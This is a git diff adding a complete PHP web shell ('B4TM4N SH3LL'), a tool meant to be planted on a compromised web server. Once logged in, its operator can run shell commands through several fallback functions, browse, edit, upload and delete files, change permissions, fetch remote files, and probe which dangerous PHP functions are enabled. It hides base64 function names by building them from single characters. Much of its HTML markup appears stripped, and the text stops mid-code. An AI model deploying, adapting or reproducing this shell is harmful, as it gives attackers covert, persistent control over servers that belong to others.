diff --git a/php/bat_b4tm4n.php b/php/bat_b4tm4n.php
new file mode 100644
index 0000000..1977089
--- /dev/null
+++ b/php/bat_b4tm4n.php
@@ -0,0 +1,3962 @@
+ "B4TM4N SH3LL", // Your Title
+ "subtitle" => "V3RS10N 2.7 ~ k4mpr3t", // Your Subtitle
+ "themes" => "br34k", // Your Themes (D4RK or BR34K)
+ "debug" => false // Debug Mode
+);
+
+$account=explode(':',$x_);
+
+session_start(); // Session Start
+
+function any($x,$y)
+{
+ return array_key_exists($x,$y);
+}
+
+function urle($x)
+{
+ return B64E(urlencode($x));
+}
+
+function urld($x)
+{
+ return urldecode(B64D(urldecode($x)));
+}
+
+define('_',DIRECTORY_SEPARATOR);
+
+foreach($_SERVER as $k => $v)
+{
+ define(strtolower($k),$_SERVER[$k]);
+}
+
+function B64E($x)
+{
+ $d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
+ $c="ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/";
+ $_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4";
+ $_g="_";$_h="e";$_i="n";$_j="c";$_k="o";$_l="d";$_m="e";
+ $b64=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m;
+ return strtr($b64($x),$d,$c);
+}
+
+function B64D($x)
+{
+ $d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
+ $c="ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/";
+ $_a="b";$_b="a";$_c="s";$_d="e";$_e="6";$_f="4";
+ $_g="_";$_h="d";$_i="e";$_j="c";$_k="o";$_l="d";$_m="e";
+ $b64=$_a.$_b.$_c.$_d.$_e.$_f.$_g.$_h.$_i.$_j.$_k.$_l.$_m;
+ return $b64(strtr($x,$d,$c));
+}
+
+function error ($errno, $errstr, $errfile, $errline)
+{
+ switch ($errno)
+ {
+ case E_PARSE:
+ case E_STRICT:$errmsg='# DEBUG';break;
+ case E_NOTICE:
+ case E_USER_NOTICE:$errmsg='# NOTICE';break;
+ case E_USER_ERROR:
+ case E_RECOVERABLE_ERROR:$errmsg='# ERROR';break;
+ case E_WARNING:
+ case E_CORE_WARNING:
+ case E_COMPILE_WARNING:
+ case E_USER_WARNING:$errmsg='# WARNING';break;
+ case E_ERROR:
+ case E_CORE_ERROR:
+ case E_COMPILE_ERROR:$errmsg='# FATAL ERROR';break;
+ default:$errmsg='# UNKNOWN ERROR';break;
+ }
+ echo '
'; + echo $errmsg; + echo "
"; + echo $errstr; + echo "
"; + echo $errfile . ' (Line: ' . $errline . ')'; + echo "
"; + echo "
"; + echo "
"; +} + +// Login Request +if(request_method=="POST") +{ + if(any("username",$_REQUEST)&&any("password",$_REQUEST)&&any("signin",$_REQUEST)) + { + if((B64E($_REQUEST['username'])==$account[0])&&(sha1(md5($_REQUEST['password']))==$account[1])) + { + session_regenerate_id(); + $_SESSION['action']=array( + "username" => B64E($_REQUEST['username']), + "password" => sha1(md5($_REQUEST['password'])) + ); + } + else + { + // THIS IS FUCKING LOCAL DAMN LOG N00B! (https://github.com/k4mpr3t/b4tm4n/issues/5) + $log=array( + "Username: ".$_REQUEST['username'], + "Password: ".$_REQUEST['password'], + "Remote IP: ".remote_addr, + "Time: ".date('Y-m-d H:i:s'), + "-------------------------\r\n", + ); + $file=dirname(__FILE__)._.'.log'; + $write_log=implode($log,"\r\n"); + $op=fopen($file,'a+'); + fwrite($op,$write_log); + fclose($op); + } + } +} + +if(!any("action",$_SESSION)) +{ +?> + + + + + +Signin + + + + +
+

Please sign in

+ + + + + +

©

+
+ + + + + +<?=$title?> + + + + + + + + +
".$x."&1'; + if(!is_null($backtic=`$x`)) + { + return $backtic; + } + elseif(function_exists('system')) + { + ob_start(); + $system=system($x); + $buff=ob_get_contents(); + ob_end_clean(); + return $buff; + } + elseif(function_exists('exec')) + { + $buff=""; + exec($x,$results); + foreach($results as $result) + { + $buff.=$result; + } + return $buff; + } + elseif(function_exists('shell_exec')) + { + $buff=shell_exec($x); + return $buff; + } + elseif(function_exists('pcntl_exec')) + { + $buff=pcntl_exec($x); + return $buff; + } + elseif(function_exists('passthru')) + { + ob_start(); + $passthru=passthru($x); + $buff=ob_get_contents(); + ob_end_clean(); + return $buff; + } + elseif(function_exists('proc_open')) + { + $proc=proc_open($x,array( + array("pipe","r"), + array("pipe","w"), + array("pipe","w") + ),$pipes); + $buff=stream_get_contents($pipes[1]); + return $buff; + } + elseif(function_exists('popen')) + { + $buff=""; + $pop=popen($x,"r"); + while(!feof($pop)) + { + $buff.=fread($pop,1024); + } + pclose($pop); + return $buff; + } + return "R.I.P Command"; +} + +function Remove($x) +{ + if(is_dir($x)) + { + if($h=@opendir($x)) + { + while(false!==($f=readdir($h))) + { + if($f!="."&&$f!="..") + { + Remove($x._.$f); + } + } + closedir($h); + } + return rmdir($x); + } + elseif(is_file($x)) + { + return unlink($x); + } + return false; +} + +function ChmodRecursive($x,$y) +{ + if(is_dir($x)) + { + if($h=@opendir($x)) + { + while(false!==($f=readdir($h))) + { + if($f!="."&&$f!="..") + { + ChmodRecursive($x._.$f); + } + } + closedir($h); + } + return chmod($x,$y); + } + elseif(is_file($x)) + { + return chmod($x,$y); + } + return false; +} + +function CopyRecursive($x,$y) +{ + if(is_dir($x)) + { + @mkdir($y); + if($h=@opendir($x)) + { + while(false!==($f=readdir($h))) + { + if($f!="."&&$f!="..") + { + CopyRecursive($x._.$f,$y._.$f); + } + } + closedir($h); + } + return true; + } + elseif(is_file($x)) + { + return copy($x,$y); + } + return false; +} + +function 
MoveRecursive($x,$y)
+{
+ if(is_dir($x))
+ {
+ @mkdir($y);
+ if($h=@opendir($x))
+ {
+ while(false!==($f=readdir($h)))
+ {
+ if($f!="."&&$f!="..")
+ {
+ MoveRecursive($x._.$f,$y._.$f);
+ }
+ }
+ closedir($h);
+ }
+ return Remove($x);
+ }
+ elseif(is_file($x))
+ {
+ if(copy($x,$y))
+ {
+ return unlink($x);
+ }
+ }
+ return false;
+}
+
+function GetDownloadUrl($x,$y)
+{
+ global $agent;
+ $fl=fopen($y,"w");
+ $ch=curl_init();
+ curl_setopt($ch,CURLOPT_USERAGENT,$agent);
+ curl_setopt($ch,CURLOPT_URL,$x);
+ curl_setopt($ch,CURLOPT_FILE,$fl);
+ curl_setopt($ch,CURLOPT_HEADER,0);
+ curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);
+ curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
+ curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
+ $rs=curl_exec($ch);
+ if(curl_error($ch)) return curl_error($ch);
+ curl_close($ch);
+ fclose($fl);
+ return true;
+}
+
+function GetUrlExists($x)
+{
+ global $agent;
+ $ch=curl_init();
+ curl_setopt($ch,CURLOPT_USERAGENT,$agent);
+ curl_setopt($ch,CURLOPT_URL,$x);
+ curl_setopt($ch,CURLOPT_TIMEOUT,5);
+ curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5);
+ curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
+ $rs=curl_exec($ch);
+ $http=curl_getinfo($ch,CURLINFO_HTTP_CODE);
+ if(curl_error($ch)) return curl_error($ch);
+ curl_close($ch);
+ return ($http>=200 && $http<300);
+}
+
+function GetUrlContent($x)
+{
+ global $agent;
+ $ch=curl_init();
+ curl_setopt($ch,CURLOPT_USERAGENT,$agent);
+ curl_setopt($ch,CURLOPT_URL,$x);
+ curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);
+ curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
+ curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
+ $rs=curl_exec($ch);
+ if(curl_error($ch)) return curl_error($ch);
+ curl_close($ch);
+ return $rs;
+}
+
+function GetUrlFromPath($x)
+{
+ $fix_path=str_replace(_,'/',$x);
+ $protocol=empty($_SERVER['HTTPS'])||$_SERVER['HTTPS']==='off'?'http://':'https://';
+ $path=str_replace(document_root,'',$fix_path);
+ return $protocol.server_name.$path;
+}
+
+function PostUrlContent($url,$content)
+{
+ global $agent;
+ $params=array(
+
'http' => array(
+ 'method' => "POST",
+ 'header' => "Content-Type: application/x-www-form-urlencoded\r\n".
+ "User-Agent: $agent\r\n",
+ 'content' => http_build_query($content)
+ )
+ );
+ $results="";
+ $context=stream_context_create($params);
+ $header=get_headers($url);
+ if($http=substr($header[0],9,3) != "200")
+ {
+ $results="Error: $http";
+ }
+ else
+ {
+ //file_get_contents
+ if($contents=file_get_contents($url,null,$context))
+ {
+ $results=htmlspecialchars($contents);
+ }
+
+ //stream_get_contents
+ if($handle=fopen($url,'r',false,$context))
+ {
+ $contents=stream_get_contents($handle);
+ fclose($handle);
+ $results=htmlspecialchars($contents);
+ }
+
+ //fopen
+ if($handle=fopen($url,'r',false,$context))
+ {
+ $contents="";
+ while(!feof($handle))
+ {
+ $contents.=fread($handle,10240);
+ }
+ fclose($handle);
+ $results=htmlspecialchars($contents);
+ }
+
+ }
+ return $results;
+}
+
+function GetFileType($x)
+{
+ if(is_file($x))
+ {
+ return pathinfo($x)['extension'];
+ }
+ elseif(is_dir($x))
+ {
+ return "dir";
+ }
+ elseif(is_link($x))
+ {
+ return "link";
+ }
+ else
+ {
+ return "-";
+ }
+}
+
+function GetFileTime($x,$y)
+{
+ switch($y)
+ {
+ case "create":return date("Y-m-d H:i:s",@filectime($x));break;
+ case "modify":return date("Y-m-d H:i:s",@filemtime($x));break;
+ case "access":return date("Y-m-d H:i:s",@fileatime($x));break;
+ }
+}
+
+function GetFilePerm($x)
+{
+ $perms=@fileperms($x);
+ switch ($perms & 0xF000)
+ {case 0xC000:$info='s';break;case 0xA000:$info='l';break;
+ case 0x8000:$info='r';break;case 0x6000:$info='b';break;
+ case 0x4000:$info='d';break;case 0x2000:$info='c';break;
+ case 0x1000:$info='p';break;default:$info='u';}
+ $info .=(($perms & 0x0100)?'r':'-');$info .=(($perms & 0x0080)?'w':'-');
+ $info .=(($perms & 0x0040)?(($perms & 0x0800)?'s':'x' ):(($perms & 0x0800)?'S':'-'));
+ $info .=(($perms & 0x0020)?'r':'-');$info .=(($perms & 0x0010)?'w':'-');
+ $info .=(($perms & 0x0008)?(($perms & 0x0400)?'s':'x' ):(($perms &
0x0400)?'S':'-'));
+ $info .=(($perms & 0x0004)?'r':'-');$info .=(($perms & 0x0002)?'w':'-');
+ $info .=(($perms & 0x0001)?(($perms & 0x0200)?'t':'x' ):(($perms & 0x0200)?'T':'-'));
+ return sprintf('%s [%s]',$info,substr(decoct($perms),2));
+}
+
+function GetFileSize($x)
+{
+ $x=abs($x);
+ $size=array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
+ $exp=$x?floor(log($x)/log(1024)):0;
+ return sprintf('%.2f '.$size[$exp],($x/pow(1024,floor($exp))));
+}
+
+function GetUser($x)
+{
+ if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
+ {
+ $uid=posix_getpwuid(posix_getuid());
+ $gid=posix_getgrgid(posix_getgid());
+
+ switch($x)
+ {
+ case 'usr':return $uid['name'];break;
+ case 'uid':return $uid['uid'];break;
+ case 'grp':return $gid['name'];break;
+ case 'gid':return $gid['gid'];break;
+ }
+ }
+ else
+ {
+ switch($x)
+ {
+ case 'usr':return get_current_user();break;
+ case 'uid':return getmyuid();break;
+ case 'grp':return "?";break;
+ case 'gid':return getmygid();break;
+ }
+ }
+}
+
+function GetOwnerGroup($x)
+{
+ if(Unix())
+ {
+ if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
+ {
+ $user=posix_getpwuid(fileowner($x));
+ $group=posix_getgrgid(filegroup($x));
+ return sprintf('%s:%s',$user['name'],$group['name']);
+ }
+ }
+ return "?:?";
+}
+
+function GetFileOwnerGroup($x)
+{
+ if(Unix())
+ {
+ if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
+ {
+ $user=posix_getpwuid(fileowner($x));
+ $group=posix_getgrgid(filegroup($x));
+ return sprintf('%s:%s/%s:%s',$user['name'],$user['uid'],$group['name'],$group['gid']);
+ }
+ }
+ return "?:?/?:?";
+}
+
+function GetSafeMode()
+{
+ if(strtolower(ini_get("safe_mode"))=='on')
+ {
+ $safemod="ON";
+ }
+ else
+ {
+ $safemod="OFF";
+ }
+ return $safemod;
+}
+
+function MapDirectory($x)
+{
+ $map="";
+ $d=str_replace("\\",_,$x);
+ if(empty($d))
+ {
+ $d=realpath(".");
+ }
+ elseif(realpath($d))
+ {
+ $d=realpath($d);
+ }
+ $d=str_replace("\\",_,$d);
+
if(substr($d,-1)!=_)
+{
+ $d.=_;
+ }
+ $d=str_replace("\\\\","\\",$d);
+ $pd=$e=explode(_,substr($d,0,-1));
+ $i=0;
+ foreach($pd as $b)
+ {
+ $t="";
+ $j=0;
+ foreach($e as $r)
+ {
+ $t.=$r._;
+ if($j==$i)
+ {
+ break;
+ }
+ $j++;
+ }
+ $map.="".htmlspecialchars($b).""._;
+ $i++;
+ }
+ return rtrim($map,_);
+}
+
+function MapDrive($x)
+{
+ if(!Unix())
+ {
+ $v=explode("\\",$x);
+ $v=$v[0];
+ $l="";
+ foreach(range("A","Z") as $lt)
+ {
+ $drive=is_dir($lt.":\\");
+ if($drive)
+ {
+ $l.="[";
+ if(strtolower($lt.':')!=strtolower($v))
+ {
+ $l.=$lt;
+ }
+ else
+ {
+ $l.="".$lt."";
+ }
+ $l.="]";
+ }
+ }
+ return $l;
+ }
+}
+
+function MainMenu()
+{
+ $menu=array(
+ "ExpL" => "?d=".urle(getcwd()),
+ "★ Sec." => "?x=secure",
+ "Info" => "?x=info",
+ "Database" => "?x=db",
+ "Terminal" => "?x=terminal",
+ "Connect" => "?x=connect",
+ ".Htaccess" => "?x=htaccess",
+ "PHP" => "?x=php",
+ "Perl/CGI" => "?x=perl",
+ "Mail" => "?x=mail",
+ "Process" => "?x=process",
+ "Shells" => "?x=shells",
+ "Symlink" => "?x=symlink",
+ "♛ Tools" => "?z",
+ "Account" => "?x=account",
+ "Update" => "?x=update",
+ "Logout" => "?x=logout"
+ );
+ $nu="";
+ foreach($menu as $key => $val)
+ {
+ $idxkey=substr($val,1,1);
+ $idxval=substr($val,3);
+ $active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":"";
+ if($key=="Logout")
+ {
+ $nu.="
  • ".$key."
  • "; + } + else + { + $nu.="
  • ".$key."
  • "; + } + } + return $nu; +} + +function MenuTools($x) +{ + global $menu_tools; + $ol=""; + return $ol; +} + +printf(" +
    + + +
    ", + php_uname(),server_software, + server_name,server_name,gethostbyname(http_host),server_port, + B64D($account[0]),remote_addr,remote_port, + GetUser("usr"),GetUser("uid"),GetUser("grp"),GetUser("gid"), + GetFileSize(@disk_free_space($dir)),GetFileSize(@disk_total_space($dir)), + php_sapi_name(),GetSafeMode(),php_self,$config['title'],$config['subtitle'], + MainMenu(),MapDrive($map),MapDirectory($map),$map +); + +if(any("g",$_REQUEST)) +{ + $g=$_REQUEST['g']; + + if (is_dir($g)) + { + header('location:'.php_self.'?d='.urle($g)); + } + elseif(is_file($g)||is_link($g)) + { + header('location:'.php_self.'?a=v&r='.urle($g)); + } + else + { + header('location:'.php_self); + } +} + +if(any("d",$_REQUEST)||request_uri===script_name) +{ + $_SESSION['c']=urle($dir); + + if(any("file",$_REQUEST)&&$_REQUEST['file']=="New File") + { + $file=trim($dir._.$_REQUEST['what']); + + if(file_exists($file)) + { + printf("
    Can't create New File!
    "); + } + else + { + $mf=@fopen($file,"w"); + fclose($mf); + header("location:".php_self."?a=e&r=".urle($file)); + } + } + if(any("directory",$_REQUEST)&&$_REQUEST['directory']=="New Dir") + { + $dire=trim($_REQUEST['what']); + + @chdir($dir); + + if(!@mkdir($dire)) + { + printf("
    Can't create New Directory!
    "); + } + else + { + printf("
    Directory '%s' Created on %s
    ",$dire,GetFileTime($dir._.$dire,'create')); + } + } + if(any("upload",$_REQUEST)&&$_REQUEST['upload']=="Upload") + { + $upload=$dir._.trim(basename($_FILES["what"]["name"])); + + if(move_uploaded_file($_FILES["what"]["tmp_name"],$upload)) + { + printf("
    File %s has been uploaded
    ",basename($_FILES["what"]["name"])); + } + else + { + printf("
    ✕ Can't upload new file! ✕
    "); + } + } + if($handle=@opendir($dir)) + { + $reads=array(); + $count_dirs=0; + $count_files=0; + + while(false!==($file=readdir($handle))) + { + $filedir=rtrim($dir,_)._.$file; + $updir=substr($dir,0,strrpos($dir,_)); + if (strlen($updir)<=2) $updir=$updir._; + $type=GetFileType($filedir); + $size=GetFileSize(@filesize($filedir)); + $last=GetFileTime($filedir,"modify"); + $perm=GetFilePerm($filedir); + $owner=GetOwnerGroup($filedir); + $mime=@mime_content_type($filedir); + $view=""; + + if(strpos($mime,'image')!==false) + { + $view="?a=v&w=i&r=".urle($filedir); + } + elseif(strpos($mime,'video')!==false) + { + $view="?a=v&w=v&r=".urle($filedir); + } + elseif(strpos($mime,'audio')!==false) + { + $view="?a=v&w=a&r=".urle($filedir); + } + else + { + $view="?a=v&r=".urle($filedir); + } + + if($file==".") + { + $reads[]="
    .
    ".strtoupper($type)."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; + } + elseif($file=="..") + { + $reads[]="
    ".$file."
    ".strtoupper($type)."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; + } + else + { + if($type=="dir") + { + $reads[]="
    ".$file."
    ".strtoupper($type)."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; + $count_dirs++; + } + else + { + $reads[]="
    ".$file."
    ".strtoupper($type)."
    ".$size."
    ".$perm."
    ".$owner."
    ".$last."
    "; + $count_files++; + } + } + } + sort($reads); + $filesdirs=""; + foreach($reads as $read) + { + $filesdirs.=$read; + } + printf("
    + + + + + +
    + +
    + +
    + +
    + +
    +
    +
    +
    + + + + + + + + + + + + + + %s + + + + + +
    NameTypeSizePermsOwner:GroupModifiedAct.
    [0] Selected | Dir's: [%s] File's: [%s]
    + + +
    +
    ", + urle($dir), + urle($dir), + urle($dir), + $filesdirs, + $count_dirs, + $count_files + ); + closedir($handle); + } + else + { + print "
    Can't Open Location
    "; + } +} + +if(any("r",$_REQUEST)) +{ + if(file_exists(urld($_REQUEST["r"]))) + { + $file=strval(urld($_REQUEST["r"])); + $status=any("status",$_SESSION)?$_SESSION['status']:""; + $back=php_self."?d=".urle($dir); + + printf("
    +
    + + + + + + + +
    Name%s
    Size%s
    Permission%s
    Create time%s
    Last modified%s
    Last accessed%s
    +
    +
    + + + + + +
    MIME%s
    Owner/Group%s
    MD5%s
    SHA1%s
    +
    +
    ", + basename($file), + GetFileSize(@filesize($file)), + GetFilePerm($file), + GetFileTime($file,"create"), + GetFileTime($file,"modify"), + GetFileTime($file,"access"), + mime_content_type($file), + GetFileOwnerGroup($file), + @md5_file($file), + @sha1_file($file) + ); + + if(is_file($file)||is_link($file)) + { + $menu=array( + + "Back" => "?a=b&r=", + "Edit" => "?a=e&r=", + "View" => "?a=v&r=", + "Copy" => "?a=cp&r=", + "Move" => "?a=mv&r=", + "Download" => "?a=d&r=", + "Hexdump" => "?a=h&r=", + "Chmod" => "?a=c&r=", + "Chown" => "?a=cwn&r=", + "Chgrp" => "?a=cgp&r=", + "Touch" => "?a=t&r=", + "Rename" => "?a=r&r=", + "Delete" => "?a=x&r=" + ); + } + elseif(is_dir($file)) + { + $menu=array( + + "Back" => "?a=b&r=", + "Chmod" => "?a=c&r=", + "Chown" => "?a=cwn&r=", + "Chgrp" => "?a=cgp&r=", + "Touch" => "?a=t&r=", + "Rename" => "?a=r&r=", + "Delete" => "?a=x&r=" + ); + } + + $nu=""; + + foreach($menu as $key => $val) + { + $idxkey=substr($val,1,1); + $idxval=substr($val,3,strpos($val,'&')-3); + $active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":""; + if($key=="Delete") + { + $nu.="
  • ".$key."
  • "; + } + elseif($key=="Back") + { + $nu.="
  • ".$key."
  • "; + } + else + { + $nu.="
  • ".$key."
  • "; + } + } + + printf("",$nu); + + if($_REQUEST['a']=='e') + { + $source=""; + + if(filesize($file) > 5242880) + { + $source.="Lazy to Read more than 5MB Files"; + } + else + { + $open=fopen($file,'r'); + + if($open) + { + while(!feof($open)) + { + $source.=htmlentities(fread($open,(1024*4))); + } + fclose($open); + } + } + + printf("
    + + + +
    ",$source,$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("save",$_REQUEST)) + { + $new_source=$_REQUEST['sourcecode']; + if(function_exists("chmod")) chmod($file,0755); + $source_edit=fopen($file,'w+'); + $tulis=fwrite($source_edit,$new_source); + fclose($source_edit); + if($tulis) + { + $_SESSION['status']="File Saved ! ".GetFileTime($file,"modify")." | ".GetFileSize(filesize($file)); + } + else + { + $_SESSION['status']="Whoops, something went wrong..."; + } + header("location:".php_self."?a=e&r=".urle($file)); + } + } + + if($_REQUEST['a']=='r') + { + printf("
    + + + +
    ",basename($file),$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("rename",$_REQUEST)) + { + $path=pathinfo(trim($file)); + $newname=$path['dirname']._.trim($_REQUEST['name']); + if(!rename(trim($file),$newname)) + { + $_SESSION['status']='Whoops, something went wrong...'; + } + else + { + $_SESSION['status']='Renamed file with success'; + } + header("location:".php_self."?a=r&r=".urle($newname)); + } + } + + if($_REQUEST['a']=='c') + { + printf("
    + + + +
    ",substr(decoct(fileperms($file)),2),$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("chmod",$_REQUEST)) + { + $octal=octdec($_REQUEST['octal']); + if(!chmod(trim($file),$octal)) + { + $_SESSION['status']='Whoops, something went wrong...'; + } + else + { + $_SESSION['status']='Chmod file with success'; + } + header("location:".php_self."?a=c&r=".urle($file)); + } + } + + if($_REQUEST['a']=='cwn') + { + $own=''; + if(function_exists('posix_getpwuid')) + { + $user=posix_getpwuid(fileowner($x)); + $own=$user['name']; + } + + printf("
    + + + +
    ",$own,$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("chown",$_REQUEST)) + { + $own=$_REQUEST['own']; + if(!chown(trim($file),$own)) + { + $_SESSION['status']='Whoops, something went wrong...'; + } + else + { + $_SESSION['status']='Chown file with success'; + } + header("location:".php_self."?a=cwn&r=".urle($file)); + } + } + + if($_REQUEST['a']=='cgp') + { + $grp=''; + if(function_exists('posix_getgrgid')) + { + $group=posix_getgrgid(filegroup($x)); + $grp=$group['name']; + } + + printf("
    + + + +
    ",$grp,$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("chgrp",$_REQUEST)) + { + $grp=$_REQUEST['grp']; + if(!chgrp(trim($file),$grp)) + { + $_SESSION['status']='Whoops, something went wrong...'; + } + else + { + $_SESSION['status']='Chgrp file with success'; + } + header("location:".php_self."?a=cgp&r=".urle($file)); + } + } + + if($_REQUEST['a']=='t') + { + printf("
    + + + +
    ",GetFileTime($file,"modify"),$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("touch",$_REQUEST)) + { + $time=$_REQUEST['time']; + if(!touch(trim($file),strtotime($time))) + { + $_SESSION['status']='Whoops, something went wrong...'; + } + else + { + $_SESSION['status']='Touched file with success'; + } + header("location:".php_self."?a=t&r=".urle($file)); + } + } + + if($_REQUEST['a']=='v') + { + printf("", + urle($file),urle($file), + urle($file),urle($file), + urle($file)); + + if(is_readable($file)) + { + if(any("w",$_REQUEST)) + { + $url=GetUrlFromPath($file); + $type=pathinfo($url)['extension']; + + if($_REQUEST['w']=='f') + { + printf("
    --> New Tab <--
    ",$url,$url); + } + + if($_REQUEST['w']=='i') + { + printf("
     Not Image
    ",$url); + } + + if($_REQUEST['w']=='v') + { + printf("
    ",$url,$type); + } + + if($_REQUEST['w']=='a') + { + printf("
    ",$url,$type); + } + } + else + { + if(filesize($file) > 5242880) + { + printf("Lazy to Read more than 5MB Files"); + } + else + { + $code=highlight_file($file,true); + printf("
    %s
    ",$code); + } + } + } + } + + if($_REQUEST['a']=='h') + { + $c=file_get_contents($file); + $n=0; + $h=array('00000000
    ','',''); + $len=strlen($c); + for($i=0;$i<$len;++$i) + { + $h[1].=sprintf('%02X',ord($c[$i])).' '; + switch(ord($c[$i])) + { + case 0: $h[2].=' ';break; + case 9: $h[2].=' ';break; + case 10:$h[2].=' ';break; + case 13:$h[2].=' ';break; + default:$h[2].=$c[$i];break; + } + $n++; + if($n==32) + { + $n=0; + if($i+1 < $len) + { + $h[0].=sprintf('%08X',$i+1).'
    '; + } + $h[1].='
    '; + $h[2].="\n"; + } + } + printf(" +
    + + + + + + +
    %s
    %s
    %s
    +
    ",$h[0],$h[1],htmlspecialchars($h[2])); + } + + if($_REQUEST['a']=='cp'||$_REQUEST['a']=='mv') + { + printf("
    + + + +
    ",$file,($_REQUEST['a']=='cp'?'Copy':'Move'),$status); + + if(any("status",$_SESSION)) unset($_SESSION['status']); + + if(any("submit",$_REQUEST)) + { + $source=$file; + $dest=$_REQUEST['file-dest']; + + if(!file_exists($dest)) + { + if ($_REQUEST['a']=='cp') + { + if(!copy(trim($source),trim($dest))) + { + $_SESSION['status']='Whoops, cannot copying...'; + } + else + { + $_SESSION['status']="Copy file with success '" . basename($dest) . "'"; + } + } + elseif($_REQUEST['a']=='mv') + { + if(!copy(trim($source),trim($dest))) + { + $_SESSION['status']='Whoops, cannot moving...'; + } + else + { + if(Remove($source)) + { + $_SESSION['status']="Move file with success"; + $file=$dest; + } + else + { + $_SESSION['status']='Whoops, just copying...'; + } + } + } + } + else + { + $_SESSION['status']="Whoops, File was Exists '" . basename($dest) . "'"; + } + + if($_REQUEST['a']=='cp') + { + header("location:".php_self."?a=cp&r=".urle($file)); + } + elseif($_REQUEST['a']=='mv') + { + header("location:".php_self."?a=mv&r=".urle($file)); + } + } + } + + if($_REQUEST['a']=='d') + { + if(file_exists($file)) + { + header('Cache-Control:must-revalidate,post-check=0,pre-check=0'); + header('Content-Disposition:attachment;filename='.basename($file)); + header('Content-Type:application/octet-stream'); + header('Content-Description:File Transfer'); + header('Content-Transfer-Encoding:binary'); + header('Content-Length:'.filesize($file)); + header('Pragma:public'); + header('Expires:0'); + ob_clean(); + readfile($file); + exit; + } + } + + if($_REQUEST['a']=='x') + { + if(file_exists($file)) + { + if(Remove($file)) + { + header("location:".$back); + } + } + + print 'Cannot Delete'; + } + } + else + { + print 'File Not Found'; + } +} + +if(any("x",$_REQUEST)) +{ + if($_REQUEST['x']=="logout") + { + session_destroy(); + session_regenerate_id(); + header('location:'.php_self); + } + if($_REQUEST['x']=="secure") + { + 
$disable_functions=array_filter(array_map('trim',explode(',',ini_get("disable_functions")))); + + $security=array('_xyec','allow_url_fopen','allow_url_include','apache_child_terminate','apache_get_modules','apache_getenv', + 'apache_note','apache_setenv','base64_decode','chdir','chgrp','chmod','chown','curl_exec','curl_multi_exec','dbase_open', + 'dbmopen','define_syslog_variables','disk_free_space','disk_total_space','diskfreespace','dl','dlopen','escapeshellarg', + 'escapeshellcmd','eval','exec','extract','filepro','filepro_retrieve','filepro_rowcount','fopen_with_path','fp','fput', + 'fputs','ftp_connect','ftp_exec','ftp_get','ftp_login','ftp_nb_fput','ftp_put','ftp_raw','ftp_rawlist','geoip_open', + 'get_cfg_var','get_current_user','get_num_redirects','getcwd','getenv','getlastmo','getmygid','getmyinode','getmypid', + 'getmyuid','getrusage','gzinflate','gzuncompress','highlight_file','hpAds_xmlrpcEncode','ini_alter','ini_get_all', + 'ini_restore','ini_set','inject_code','leak','link','listen','mainwork','mb_send_mail','mkdir','mkfifo','move_uploaded_file', + 'mysql_list_dbs','mysql_pconnect','openlog','parse_ini_file','passthru','pcntl_alarm','pcntl_exec','pcntl_fork', + 'pcntl_get_last_error','pcntl_getpriority','pcntl_setpriority','pcntl_signal','pcntl_signal_dispatch','pcntl_sigprocmask', + 'pcntl_sigtimedwait','pcntl_sigwaitinfo','pcntl_strerrorp','pcntl_wait','pcntl_waitpid','pcntl_wexitstatus','pcntl_wifexited', + 'pcntl_wifsignaled','pcntl_wifstopped','pcntl_wstopsig','pcntl_wtermsig','pfsockopen','phpAds_XmlRpc','phpAds_remoteInfo', + 'phpAds_xmlrpcDecode','phpAds_xmlrpcEncode','php_uname','phpinfo','popen','posix_getgrgid','posix_getlogin','posix_getpwuid', + 'posix_kill','posix_mkfifo','posix_setpgid','posix_setsid','posix_setuid','posix_ttyname','posix_uname','posixc','proc_close', + 'proc_get_stats','proc_get_status','proc_nice','proc_open','proc_terminate','ps_aux','putenv','readlink','rename','rmdir', + 
'runkit_function_rename','set_time_limit','sh2_exec','shell_exec','show_source','sleep','socket_accept','socket_bind', + 'socket_clear_error','socket_close','socket_connect','socket_create','socket_create_listen','socket_create_pair', + 'socket_get_option','socket_getpeername','socket_getsockname','socket_last_error','socket_listen','socket_read', + 'socket_recv','socket_recvfrom','socket_select','socket_send','socket_sendto','socket_set_block','socket_set_nonblock', + 'socket_set_option','socket_shutdown','socket_strerror','socket_write','str_rot13','stream_select','stream_socket_server', + 'symlink','syslog','system','tp_exec','virtual','xmlrpc_entity_decode'); + + sort($security); + $fucks=array_unique(array_merge($disable_functions,$security)); + $table=""; + $enable=0; + $disable=0; + $die=array(); + $ready=array(); + $off=array(); + $total=count($fucks); + + foreach($fucks as $fuck) + { + $table.="$fuck"; + if(in_array($fuck,$disable_functions)) + { + $table.="
    DIE
